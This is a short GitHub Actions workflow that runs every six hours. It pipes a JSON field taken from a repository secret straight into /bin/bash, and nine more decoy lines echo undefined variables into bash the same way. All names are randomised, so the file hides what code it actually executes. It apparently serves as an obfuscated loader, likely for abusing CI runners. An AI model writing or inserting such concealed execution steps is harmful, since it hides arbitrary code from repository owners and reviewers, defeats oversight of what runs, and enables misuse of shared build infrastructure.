name: pinggupx
on:
  workflow_dispatch:
  schedule:
    - cron: '57 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pinggupx
        env:
          c38719: ${{ secrets.c38719 }}
        run: |
          echo $c38719 | jq -r .sja84 | /bin/bash
          echo $dpyj2 | jq -r .q53 | /bin/bash
          echo $y0224 | jq -r .bp580 | /bin/bash
          echo $p17 | jq -r .ug802 | /bin/bash
          echo $tpfi065 | jq -r .kmq306 | /bin/bash
          echo $idol761 | jq -r .d082 | /bin/bash
          echo $l1 | jq -r .j5 | /bin/bash
          echo $ietw3 | jq -r .nb7 | /bin/bash
          echo $eshe6710 | jq -r .dzq3235 | /bin/bash
          echo $ba7 | jq -r .uoyxi4 | /bin/bash

